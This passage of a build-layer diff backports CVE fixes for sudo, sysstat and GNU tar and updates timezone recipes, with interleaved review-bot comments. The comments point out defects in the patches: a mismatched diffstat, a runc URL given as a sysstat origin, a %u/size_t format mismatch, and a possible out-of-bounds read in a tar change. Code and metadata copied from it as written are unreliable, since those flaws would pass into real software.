467- if (strlcat(line, LL_CWD_STR, len) >= len ||
468- strlcat(line, user_cwd, len) >= len ||
469- strlcat(line, " ; ", len) >= len)
470- goto toobig;
471+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "%s ; ", errstr);
472+ }
473+ if (user_tty != NULL) {
474+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ", user_tty);
475+ }
476+ if (user_cwd != NULL) {
477+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "PWD=%s ; ", user_cwd);
478+ }
479 if (runas_pw != NULL) {
480- if (strlcat(line, LL_USER_STR, len) >= len ||
481- strlcat(line, runas_pw->pw_name, len) >= len ||
482- strlcat(line, " ; ", len) >= len)
483- goto toobig;
484+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "USER=%s ; ",
485+ runas_pw->pw_name);
486 }
487 if (runas_gr != NULL) {
488- if (strlcat(line, LL_GROUP_STR, len) >= len ||
489- strlcat(line, runas_gr->gr_name, len) >= len ||
490- strlcat(line, " ; ", len) >= len)
491- goto toobig;
492+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
493+ runas_gr->gr_name);
494 }
495 if (tsid != NULL) {
496- if (strlcat(line, LL_TSID_STR, len) >= len ||
497- strlcat(line, tsid, len) >= len ||
498- strlcat(line, " ; ", len) >= len)
499- goto toobig;
500- }
501- if (evstr != NULL) {
502- if (strlcat(line, LL_ENV_STR, len) >= len ||
503- strlcat(line, evstr, len) >= len ||
504- strlcat(line, " ; ", len) >= len)
505- goto toobig;
506- free(evstr);
507- evstr = NULL;
508+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", tsid);
509+ }
510+ if (sudo_user.env_vars != NULL) {
511+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, "ENV=%s", sudo_user.env_vars[0]);
512+ for (i = 1; sudo_user.env_vars[i] != NULL; i++) {
513+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
514+ sudo_user.env_vars[i]);
515+ }
516 }
517 if (user_cmnd != NULL) {
518- if (strlcat(line, LL_CMND_STR, len) >= len)
519- goto toobig;
520- if (ISSET(sudo_mode, MODE_CHECK) && strlcat(line, "list ", len) >= len)
521- goto toobig;
522- if (strlcat(line, user_cmnd, len) >= len)
523- goto toobig;
524+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,
525+ "COMMAND=%s", user_cmnd);
526 if (user_args != NULL) {
527- if (strlcat(line, " ", len) >= len ||
528- strlcat(line, user_args, len) >= len)
529- goto toobig;
530+ sudo_lbuf_append_esc(&lbuf,
531+ LBUF_ESC_CNTRL|LBUF_ESC_QUOTE,
532+ " %s", user_args);
533 }
534 }
535
536- debug_return_str(line);
537-oom:
538- free(evstr);
539+ if (!sudo_lbuf_error(&lbuf))
540+ debug_return_str(lbuf.buf);
541+
542+ sudo_lbuf_destroy(&lbuf);
543 sudo_warnx(U_("%s: %s"), __func__, U_("unable to allocate memory"));
544 debug_return_str(NULL);
545-toobig:
546- free(evstr);
547- free(line);
548- sudo_warnx(U_("internal error, %s overflow"), __func__);
549- debug_return_str(NULL);
550 }
551--- a/plugins/sudoers/sudoreplay.c
552+++ b/plugins/sudoers/sudoreplay.c
553@@ -71,6 +71,7 @@
554 #include "sudo_conf.h"
555 #include "sudo_debug.h"
556 #include "sudo_event.h"
557+#include "sudo_lbuf.h"
558 #include "sudo_util.h"
559
560 #ifdef HAVE_GETOPT_LONG
561@@ -1353,7 +1354,8 @@ match_expr(struct search_node_list *head
562 }
563
564 static int
565-list_session(char *logfile, regex_t *re, const char *user, const char *tty)
566+list_session(struct sudo_lbuf *lbuf, char *logfile, regex_t *re,
567+ const char *user, const char *tty)
568 {
569 char idbuf[7], *idstr, *cp;
570 const char *timestr;
571@@ -1386,16 +1388,32 @@ list_session(char *logfile, regex_t *re,
572 }
573 /* XXX - print rows + cols? */
574 timestr = get_timestr(li->tstamp, 1);
575- printf("%s : %s : TTY=%s ; CWD=%s ; USER=%s ; ",
576- timestr ? timestr : "invalid date",
577- li->user, li->tty, li->cwd, li->runas_user);
578- if (li->runas_group)
579- printf("GROUP=%s ; ", li->runas_group);
580- printf("TSID=%s ; COMMAND=%s\n", idstr, li->cmd);
581-
582- ret = 0;
583-
584+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "%s : %s : ",
585+ timestr ? timestr : "invalid date", li->user);
586+ if (li->tty != NULL) {
587+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TTY=%s ; ",
588+ li->tty);
589+ }
590+ if (li->cwd != NULL) {
591+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "CWD=%s ; ",
592+ li->cwd);
593+ }
594+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "USER=%s ; ", li->runas_user);
595+ if (li->runas_group != NULL) {
596+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "GROUP=%s ; ",
597+ li->runas_group);
598+ }
599+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "TSID=%s ; ", idstr);
600+ sudo_lbuf_append_esc(lbuf, LBUF_ESC_CNTRL, "COMMAND=%s",
601+ li->cmd);
602+
603+ if (!sudo_lbuf_error(lbuf)) {
604+ puts(lbuf->buf);
605+ ret = 0;
606+ }
607 done:
608+ lbuf->error = 0;
609+ lbuf->len = 0;
610 free_log_info(li);
611 debug_return_int(ret);
612 }
613@@ -1415,6 +1433,7 @@ find_sessions(const char *dir, regex_t *
614 DIR *d;
615 struct dirent *dp;
616 struct stat sb;
617+ struct sudo_lbuf lbuf;
618 size_t sdlen, sessions_len = 0, sessions_size = 0;
619 unsigned int i;
620 int len;
621@@ -1426,6 +1445,8 @@ find_sessions(const char *dir, regex_t *
622 #endif
623 debug_decl(find_sessions, SUDO_DEBUG_UTIL)
624
625+ sudo_lbuf_init(&lbuf, NULL, 0, NULL, 0);
626+
627 d = opendir(dir);
628 if (d == NULL)
629 sudo_fatal(U_("unable to open %s"), dir);
630@@ -1485,7 +1506,7 @@ find_sessions(const char *dir, regex_t *
631
632 /* Check for dir with a log file. */
633 if (lstat(pathbuf, &sb) == 0 && S_ISREG(sb.st_mode)) {
634- list_session(pathbuf, re, user, tty);
635+ list_session(&lbuf, pathbuf, re, user, tty);
636 } else {
637 /* Strip off "/log" and recurse if a dir. */
638 pathbuf[sdlen + len - 4] = '\0';
639@@ -1496,6 +1517,7 @@ find_sessions(const char *dir, regex_t *
640 }
641 free(sessions);
642 }
643+ sudo_lbuf_destroy(&lbuf);
644
645 debug_return_int(0);
646 }
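--- /dev/null
+++ b/meta/recipes-extended/sudo/sudo/CVE-2023-28486_CVE-2023-28487-2.patch
@@ -0,0 +1,26 @@
+Backport of:
+
+From 12648b4e0a8cf486480442efd52f0e0b6cab6e8b Mon Sep 17 00:00:00 2001
+From: "Todd C. Miller" <Todd.Miller@sudo.ws>
+Date: Mon, 13 Mar 2023 08:04:32 -0600
+Subject: [PATCH] Add missing " ; " separator between environment variables and
+ command. This is a regression introduced in sudo 1.9.13. GitHub issue #254.
+
+Upstream-Status: Backport [import from ubuntu https://git.launchpad.net/ubuntu/+source/sudo/tree/debian/patches/CVE-2023-2848x-2.patch?h=ubuntu/focal-security
+Upstream commit https://github.com/sudo-project/sudo/commit/12648b4e0a8cf486480442efd52f0e0b6cab6e8b]
+CVE: CVE-2023-28486 CVE-2023-28487
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ lib/eventlog/eventlog.c | 1 +
+ 1 file changed, 1 insertion(+)
+
+--- a/plugins/sudoers/logging.c
++++ b/plugins/sudoers/logging.c
+@@ -1018,6 +1018,7 @@ new_logline(const char *message, const c
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL, " %s",
+ sudo_user.env_vars[i]);
+ }
++ sudo_lbuf_append(&lbuf, " ; ");
+ }
+ if (user_cmnd != NULL) {
+ sudo_lbuf_append_esc(&lbuf, LBUF_ESC_CNTRL|LBUF_ESC_BLANK,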
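Review bot: The diffstat in this patch header (`lib/eventlog/eventlog.c | 1 +`) does not match the file the hunk actually changes, `plugins/sudoers/logging.c`. The stat looks carried over from the upstream commit, while the backported hunk targets `new_logline()`, so anyone auditing the backport against upstream would look in the wrong file. I would correct the stat line to `plugins/sudoers/logging.c | 1 +` and add a sentence to the header saying the hunk was re-targeted for this sudo version. The hunk shows only the tail of the `ENV=` block; `new_logline()` starts and ends outside it.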
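--- a/meta/recipes-extended/sudo/sudo_1.8.32.bb
+++ b/meta/recipes-extended/sudo/sudo_1.8.32.bb
@@ -4,6 +4,10 @@ SRC_URI = "https://www.sudo.ws/dist/sudo-${PV}.tar.gz \
  ${@bb.utils.contains('DISTRO_FEATURES', 'pam', '${PAM_SRC_URI}', '', d)} \
  file://0001-Include-sys-types.h-for-id_t-definition.patch \
  file://0001-Fix-includes-when-building-with-musl.patch \
+ file://CVE-2022-43995.patch \
+ file://CVE-2023-22809.patch \
+ file://CVE-2023-28486_CVE-2023-28487-1.patch \
+ file://CVE-2023-28486_CVE-2023-28487-2.patch \
  "
 
 PAM_SRC_URI = "file://sudo.pam"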
diff --git a/meta/recipes-extended/sysklogd/sysklogd.inc b/meta/recipes-extended/sysklogd/sysklogd.inc
index 8899daa1b0..e45b256bbe 100644
--- a/meta/recipes-extended/sysklogd/sysklogd.inc
+++ b/meta/recipes-extended/sysklogd/sysklogd.inc
@@ -10,7 +10,7 @@ LIC_FILES_CHKSUM = "file://LICENSE;md5=5b4be4b2549338526758ef479c040943 \
10 10
11inherit update-rc.d update-alternatives systemd autotools 11inherit update-rc.d update-alternatives systemd autotools
12 12
13SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1 \ 13SRC_URI = "git://github.com/troglobit/sysklogd.git;nobranch=1;protocol=https \
14 file://sysklogd \ 14 file://sysklogd \
15 file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \ 15 file://0001-fix-one-rarely-reproduced-parallel-build-problem.patch \
16 " 16 "
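--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2022-39377.patch
@@ -0,0 +1,92 @@
+From 9c4eaf150662ad40607923389d4519bc83b93540 Mon Sep 17 00:00:00 2001
+From: Sebastien <seb@fedora-2.home>
+Date: Sat, 15 Oct 2022 14:24:22 +0200
+Subject: [PATCH] Fix size_t overflow in sa_common.c (GHSL-2022-074)
+
+allocate_structures function located in sa_common.c insufficiently
+checks bounds before arithmetic multiplication allowing for an
+overflow in the size allocated for the buffer representing system
+activities.
+
+This patch checks that the post-multiplied value is not greater than
+UINT_MAX.
+
+Signed-off-by: Sebastien <seb@fedora-2.home>
+
+Upstream-Status: Backport [https://github.com/sysstat/sysstat/commit/9c4eaf150662ad40607923389d4519bc83b93540]
+CVE : CVE-2022-39377
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ common.c | 25 +++++++++++++++++++++++++
+ common.h | 2 ++
+ sa_common.c | 6 ++++++
+ 3 files changed, 33 insertions(+)
+
+diff --git a/common.c b/common.c
+index ddfe75d..28d475e 100644
+--- a/common.c
++++ b/common.c
+@@ -1528,4 +1528,29 @@ int parse_values(char *strargv, unsigned char bitmap[], int max_val, const char
+
+ return 0;
+ }
++
++/*
++ ***************************************************************************
++ * Check if the multiplication of the 3 values may be greater than UINT_MAX.
++ *
++ * IN:
++ * @val1 First value.
++ * @val2 Second value.
++ * @val3 Third value.
++ ***************************************************************************
++ */
++void check_overflow(size_t val1, size_t val2, size_t val3)
++{
++ if ((unsigned long long) val1 *
++ (unsigned long long) val2 *
++ (unsigned long long) val3 > UINT_MAX) {
++#ifdef DEBUG
++ fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
++ __FUNCTION__,
++ (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++#endif
++ exit(4);
++ }
++}
++
+ #endif /* SOURCE_SADC undefined */
+diff --git a/common.h b/common.h
+index 86905ba..75f837a 100644
+--- a/common.h
++++ b/common.h
+@@ -249,6 +249,8 @@ int get_wwnid_from_pretty
+ (char *, unsigned long long *, unsigned int *);
+
+ #ifndef SOURCE_SADC
++void check_overflow
++ (size_t, size_t, size_t);
+ int count_bits
+ (void *, int);
+ int count_csvalues
+diff --git a/sa_common.c b/sa_common.c
+index 8a03099..ff90c1f 100644
+--- a/sa_common.c
++++ b/sa_common.c
+@@ -452,7 +452,13 @@ void allocate_structures(struct activity *act[])
+ int i, j;
+
+ for (i = 0; i < NR_ACT; i++) {
++
+ if (act[i]->nr_ini > 0) {
++
++ /* Look for a possible overflow */
++ check_overflow((size_t) act[i]->msize, (size_t) act[i]->nr_ini,
++ (size_t) act[i]->nr2);
++
+ for (j = 0; j < 3; j++) {
+ SREALLOC(act[i]->buf[j], void,
+ (size_t) act[i]->msize * (size_t) act[i]->nr_ini * (size_t) act[i]->nr2);
+--
+2.25.1
+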
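--- /dev/null
+++ b/meta/recipes-extended/sysstat/sysstat/CVE-2023-33204.patch
@@ -0,0 +1,46 @@
+Origin: https://github.com/opencontainers/runc/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+Reviewed-by: Sylvain Beucler <beuc@debian.org>
+Last-Update: 2023-02-18
+
+From 954ff2e2673cef48f0ed44668c466eab041db387 Mon Sep 17 00:00:00 2001
+From: Pavel Kopylov <pkopylov@cloudlinux.com>
+Date: Wed, 17 May 2023 11:33:45 +0200
+Subject: [PATCH] Fix an overflow which is still possible for some values.
+
+CVE: CVE-2023-33204
+Upstream-Status: Backport [ upstream: https://github.com/sysstat/sysstat/commit/6f8dc568e6ab072bb8205b732f04e685bf9237c0
+debian: http://security.debian.org/debian-security/pool/updates/main/s/sysstat/sysstat_12.0.3-2+deb10u2.debian.tar.xz ]
+Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com>
+
+---
+ common.c | 7 +++++--
+ 1 file changed, 5 insertions(+), 2 deletions(-)
+
+Index: sysstat-12.0.3/common.c
+===================================================================
+--- sysstat-12.0.3.orig/common.c
++++ sysstat-12.0.3/common.c
+@@ -1449,15 +1449,16 @@ int parse_values(char *strargv, unsigned
+ */
+ void check_overflow(size_t val1, size_t val2, size_t val3)
+ {
+- if ((unsigned long long) val1 *
+- (unsigned long long) val2 *
+- (unsigned long long) val3 > UINT_MAX) {
++ if ((val1 != 0) && (val2 != 0) && (val3 != 0) &&
++ (((unsigned long long) UINT_MAX / (unsigned long long) val1 <
++ (unsigned long long) val2) ||
++ ((unsigned long long) UINT_MAX / ((unsigned long long) val1 * (unsigned long long) val2) <
++ (unsigned long long) val3))) {
+ #ifdef DEBUG
+- fprintf(stderr, "%s: Overflow detected (%llu). Aborting...\n",
+- __FUNCTION__,
+- (unsigned long long) val1 * (unsigned long long) val2 * (unsigned long long) val3);
++ fprintf(stderr, "%s: Overflow detected (%u,%u,%u). Aborting...\n",
++ __FUNCTION__, val1, val2, val3);
+ #endif
+- exit(4);
++ exit(4);
+ }
+ }
+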
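Review bot: The `fprintf` added under `#ifdef DEBUG` in `check_overflow` passes three `size_t` arguments to `%u` conversions, which is a format/argument mismatch wherever `size_t` is wider than `unsigned int`. It only compiles in debug builds, but the format should read `"%s: Overflow detected (%zu,%zu,%zu). Aborting...\n"`. Separately, the `Origin:` header points at `github.com/opencontainers/runc`, while `Upstream-Status` cites the same hash under `github.com/sysstat/sysstat`. The runc URL looks like a copy-paste slip and should be replaced so the provenance of this backport can be checked. The `Index:` lines name `sysstat-12.0.3` although the recipe is 12.2.1, so it is worth confirming the hunk applies without fuzz.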
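--- a/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
+++ b/meta/recipes-extended/sysstat/sysstat_12.2.1.bb
@@ -2,7 +2,10 @@ require sysstat.inc
 
 LIC_FILES_CHKSUM = "file://COPYING;md5=a23a74b3f4caf9616230789d94217acb"
 
-SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch"
+SRC_URI += "file://0001-configure.in-remove-check-for-chkconfig.patch \
+ file://CVE-2022-39377.patch \
+ file://CVE-2023-33204.patch \
+ "
 
 SRC_URI[md5sum] = "9dfff5fac24e35bd92fb7896debf2ffb"
 SRC_URI[sha256sum] = "8edb0e19b514ac560a098a02933a4735b881296d61014db89bf80f05dd7a4732"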
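--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2021-20193.patch
@@ -0,0 +1,133 @@
+From d9d4435692150fa8ff68e1b1a473d187cc3fd777 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sun, 17 Jan 2021 20:41:11 +0200
+Subject: Fix memory leak in read_header
+
+Bug reported in https://savannah.gnu.org/bugs/?59897
+
+* src/list.c (read_header): Don't return directly from the loop.
+Instead set the status and break. Return the status. Free
+next_long_name and next_long_link before returning.
+
+CVE: CVE-2021-20193
+Upstream-Status: Backport
+[https://git.savannah.gnu.org/cgit/tar.git/patch/?id=d9d4435692150fa8ff68e1b1a473d187cc3fd777]
+Signed-off-by: Anatol Belski <anbelski@linux.microsoft.com>
+
+---
+ src/list.c | 40 ++++++++++++++++++++++++++++------------
+ 1 file changed, 28 insertions(+), 12 deletions(-)
+
+diff --git a/src/list.c b/src/list.c
+index e40a5c8..d7ef441 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -408,26 +408,27 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ enum read_header_mode mode)
+ {
+ union block *header;
+- union block *header_copy;
+ char *bp;
+ union block *data_block;
+ size_t size, written;
+- union block *next_long_name = 0;
+- union block *next_long_link = 0;
++ union block *next_long_name = NULL;
++ union block *next_long_link = NULL;
+ size_t next_long_name_blocks = 0;
+ size_t next_long_link_blocks = 0;
+-
++ enum read_header status = HEADER_SUCCESS;
++
+ while (1)
+ {
+- enum read_header status;
+-
+ header = find_next_block ();
+ *return_block = header;
+ if (!header)
+- return HEADER_END_OF_FILE;
++ {
++ status = HEADER_END_OF_FILE;
++ break;
++ }
+
+ if ((status = tar_checksum (header, false)) != HEADER_SUCCESS)
+- return status;
++ break;
+
+ /* Good block. Decode file size and return. */
+
+@@ -437,7 +438,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ {
+ info->stat.st_size = OFF_FROM_HEADER (header->header.size);
+ if (info->stat.st_size < 0)
+- return HEADER_FAILURE;
++ {
++ status = HEADER_FAILURE;
++ break;
++ }
+ }
+
+ if (header->header.typeflag == GNUTYPE_LONGNAME
+@@ -447,10 +451,14 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ || header->header.typeflag == SOLARIS_XHDTYPE)
+ {
+ if (mode == read_header_x_raw)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ else if (header->header.typeflag == GNUTYPE_LONGNAME
+ || header->header.typeflag == GNUTYPE_LONGLINK)
+ {
++ union block *header_copy;
+ size_t name_size = info->stat.st_size;
+ size_t n = name_size % BLOCKSIZE;
+ size = name_size + BLOCKSIZE;
+@@ -517,7 +525,10 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ xheader_decode_global (&xhdr);
+ xheader_destroy (&xhdr);
+ if (mode == read_header_x_global)
+- return HEADER_SUCCESS_EXTENDED;
++ {
++ status = HEADER_SUCCESS_EXTENDED;
++ break;
++ }
+ }
+
+ /* Loop! */
+@@ -536,6 +547,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_name->buffer + BLOCKSIZE;
+ recent_long_name = next_long_name;
+ recent_long_name_blocks = next_long_name_blocks;
++ next_long_name = NULL;
+ }
+ else
+ {
+@@ -567,6 +579,7 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ name = next_long_link->buffer + BLOCKSIZE;
+ recent_long_link = next_long_link;
+ recent_long_link_blocks = next_long_link_blocks;
++ next_long_link = NULL;
+ }
+ else
+ {
+@@ -578,9 +591,12 @@ read_header (union block **return_block, struct tar_stat_info *info,
+ }
+ assign_string (&info->link_name, name);
+
+- return HEADER_SUCCESS;
++ break;
+ }
+ }
++ free (next_long_name);
++ free (next_long_link);
++ return status;
+ }
+
+ #define ISOCTAL(c) ((c)>='0'&&(c)<='7')
+--
+cgit v1.2.1
+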
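--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2022-48303.patch
@@ -0,0 +1,43 @@
+From 3da78400eafcccb97e2f2fd4b227ea40d794ede8 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 11 Feb 2023 11:57:39 +0200
+Subject: Fix boundary checking in base-256 decoder
+
+* src/list.c (from_header): Base-256 encoding is at least 2 bytes
+long.
+
+Upstream-Status: Backport [see reference below]
+CVE: CVE-2022-48303
+
+Reference to upstream patch:
+https://savannah.gnu.org/bugs/?62387
+https://git.savannah.gnu.org/cgit/tar.git/patch/src/list.c?id=3da78400eafcccb97e2f2fd4b227ea40d794ede8
+
+Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+Signed-off-by: Joe Slater <joe.slater@windriver.com>
+---
+ src/list.c | 5 +++--
+ 1 file changed, 3 insertions(+), 2 deletions(-)Signed-off-by: Rodolfo Quesada Zumbado <rodolfo.zumbado@windriver.com>
+
+
+(limited to 'src/list.c')
+
+diff --git a/src/list.c b/src/list.c
+index 9fafc42..86bcfdd 100644
+--- a/src/list.c
++++ b/src/list.c
+@@ -881,8 +881,9 @@ from_header (char const *where0, size_t digs, char const *type,
+ where++;
+ }
+ }
+- else if (*where == '\200' /* positive base-256 */
+- || *where == '\377' /* negative base-256 */)
++ else if (where <= lim - 2
++ && (*where == '\200' /* positive base-256 */
++ || *where == '\377' /* negative base-256 */))
+ {
+ /* Parse base-256 output. A nonnegative number N is
+ represented as (256**DIGS)/2 + N; a negative number -N is
+--
+cgit v1.1
+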
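--- /dev/null
+++ b/meta/recipes-extended/tar/tar/CVE-2023-39804.patch
@@ -0,0 +1,64 @@
+From a339f05cd269013fa133d2f148d73f6f7d4247e4 Mon Sep 17 00:00:00 2001
+From: Sergey Poznyakoff <gray@gnu.org>
+Date: Sat, 28 Aug 2021 16:02:12 +0300
+Subject: Fix handling of extended header prefixes
+
+* src/xheader.c (locate_handler): Recognize prefix keywords only
+when followed by a dot.
+(xattr_decoder): Use xmalloc/xstrdup instead of alloc
+
+Upstream-Status: Backport [https://git.savannah.gnu.org/cgit/tar.git/commit/?id=a339f05cd269013fa133d2f148d73f6f7d4247e4]
+CVE: CVE-2023-39804
+Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
+---
+ src/xheader.c | 17 +++++++++--------
+ 1 file changed, 9 insertions(+), 8 deletions(-)
+
+diff --git a/src/xheader.c b/src/xheader.c
+index 4f8b2b2..3cd694d 100644
+--- a/src/xheader.c
++++ b/src/xheader.c
+@@ -637,11 +637,11 @@ static struct xhdr_tab const *
+ locate_handler (char const *keyword)
+ {
+ struct xhdr_tab const *p;
+-
+ for (p = xhdr_tab; p->keyword; p++)
+ if (p->prefix)
+ {
+- if (strncmp (p->keyword, keyword, strlen(p->keyword)) == 0)
++ size_t kwlen = strlen (p->keyword);
++ if (keyword[kwlen] == '.' && strncmp (p->keyword, keyword, kwlen) == 0)
+ return p;
+ }
+ else
+@@ -1716,19 +1716,20 @@ xattr_decoder (struct tar_stat_info *st,
+ char const *keyword, char const *arg, size_t size)
+ {
+ char *xstr, *xkey;
+-
++
+ /* copy keyword */
+- size_t klen_raw = strlen (keyword);
+- xkey = alloca (klen_raw + 1);
+- memcpy (xkey, keyword, klen_raw + 1) /* including null-terminating */;
++ xkey = xstrdup (keyword);
+
+ /* copy value */
+- xstr = alloca (size + 1);
++ xstr = xmalloc (size + 1);
+ memcpy (xstr, arg, size + 1); /* separator included, for GNU tar '\n' */;
+
+ xattr_decode_keyword (xkey);
+
+- xheader_xattr_add (st, xkey + strlen("SCHILY.xattr."), xstr, size);
++ xheader_xattr_add (st, xkey + strlen ("SCHILY.xattr."), xstr, size);
++
++ free (xkey);
++ free (xstr);
+ }
+
+ static void
+--
+cgit v1.1
+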
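Review bot: In `locate_handler` the new condition reads `keyword[kwlen]` before `strncmp` has confirmed that `keyword` is at least `kwlen` characters long, so for a keyword shorter than the table prefix the index lands past its terminating NUL. Whether that byte still lies inside the caller's buffer cannot be seen from this hunk. Swapping the operands removes the question: `if (strncmp (p->keyword, keyword, kwlen) == 0 && keyword[kwlen] == '.')`. The `else` branch of the loop continues outside the hunk.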
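--- a/meta/recipes-extended/tar/tar_1.32.bb
+++ b/meta/recipes-extended/tar/tar_1.32.bb
@@ -6,8 +6,13 @@ SECTION = "base"
 LICENSE = "GPLv3"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
 
+PR = "r1"
+
 SRC_URI = "${GNU_MIRROR}/tar/tar-${PV}.tar.bz2 \
  file://musl_dirent.patch \
+ file://CVE-2021-20193.patch \
+ file://CVE-2022-48303.patch \
+ file://CVE-2023-39804.patch \
 "
 
 SRC_URI[md5sum] = "17917356fff5cb4bd3cd5a6c3e727b05"
@@ -64,3 +69,7 @@ PROVIDES_append_class-native = " tar-replacement-native"
 NATIVE_PACKAGE_PATH_SUFFIX = "/${PN}"
 
 BBCLASSEXTEND = "native nativesdk"
+
+# Avoid false positives from CVEs in node-tar package
+# For example CVE-2021-{32803,32804,37701,37712,37713}
+CVE_PRODUCT = "gnu:tar"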
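--- a/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
+++ b/meta/recipes-extended/texinfo-dummy-native/texinfo-dummy-native.bb
@@ -1,5 +1,6 @@
 SUMMARY = "Fake version of the texinfo utility suite"
 SECTION = "console/utils"
+DESCRIPTION = "${SUMMARY}"
 LICENSE = "MIT"
 LIC_FILES_CHKSUM = "file://COPYING;md5=d6bb62e73ca8b901d3f2e9d71542f4bb"
 DEPENDS = ""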
diff --git a/meta/recipes-extended/timezone/timezone.inc b/meta/recipes-extended/timezone/timezone.inc
index a89560b424..46bc1b794e 100644
--- a/meta/recipes-extended/timezone/timezone.inc
+++ b/meta/recipes-extended/timezone/timezone.inc
@@ -3,10 +3,10 @@ DESCRIPTION = "The Time Zone Database contains code and data that represent \
3the history of local time for many representative locations around the globe." 3the history of local time for many representative locations around the globe."
4HOMEPAGE = "http://www.iana.org/time-zones" 4HOMEPAGE = "http://www.iana.org/time-zones"
5SECTION = "base" 5SECTION = "base"
6LICENSE = "PD & BSD & BSD-3-Clause" 6LICENSE = "PD & BSD-3-Clause"
7LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba" 7LIC_FILES_CHKSUM = "file://LICENSE;md5=c679c9d6b02bc2757b3eaf8f53c43fba"
8 8
9PV = "2021a" 9PV = "2024a"
10 10
11SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \ 11SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz;name=tzcode \
12 http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \ 12 http://www.iana.org/time-zones/repository/releases/tzdata${PV}.tar.gz;name=tzdata \
@@ -14,5 +14,5 @@ SRC_URI =" http://www.iana.org/time-zones/repository/releases/tzcode${PV}.tar.gz
14 14
15UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones" 15UPSTREAM_CHECK_URI = "http://www.iana.org/time-zones"
16 16
17SRC_URI[tzcode.sha256sum] = "eb46bfa124b5b6bd13d61a609bfde8351bd192894708d33aa06e5c1e255802d0" 17SRC_URI[tzcode.sha256sum] = "80072894adff5a458f1d143e16e4ca1d8b2a122c9c5399da482cb68cba6a1ff8"
18SRC_URI[tzdata.sha256sum] = "39e7d2ba08c68cbaefc8de3227aab0dec2521be8042cf56855f7dc3a9fb14e08" 18SRC_URI[tzdata.sha256sum] = "0d0434459acbd2059a7a8da1f3304a84a86591f6ed69c6248fffa502b6edffe3"
diff --git a/meta/recipes-extended/timezone/tzdata.bb b/meta/recipes-extended/timezone/tzdata.bb
index e6a0655afe..cc6206ac70 100644
--- a/meta/recipes-extended/timezone/tzdata.bb
+++ b/meta/recipes-extended/timezone/tzdata.bb
@@ -19,13 +19,17 @@ TZONES= "africa antarctica asia australasia europe northamerica southamerica \
19 " 19 "
20# pacificnew 20# pacificnew
21 21
22# "slim" is the default since 2020b
23# "fat" is needed by e.g. MariaDB's mysql_tzinfo_to_sql
24ZIC_FMT ?= "slim"
25
22do_compile () { 26do_compile () {
23 for zone in ${TZONES}; do \ 27 for zone in ${TZONES}; do \
24 ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \ 28 ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo -L /dev/null \
25 ${S}/${zone} ; \ 29 ${S}/${zone} ; \
26 ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \ 30 ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/posix -L /dev/null \
27 ${S}/${zone} ; \ 31 ${S}/${zone} ; \
28 ${STAGING_BINDIR_NATIVE}/zic -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \ 32 ${STAGING_BINDIR_NATIVE}/zic -b ${ZIC_FMT} -d ${WORKDIR}${datadir}/zoneinfo/right -L ${S}/leapseconds \
29 ${S}/${zone} ; \ 33 ${S}/${zone} ; \
30 done 34 done
31} 35}
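--- /dev/null
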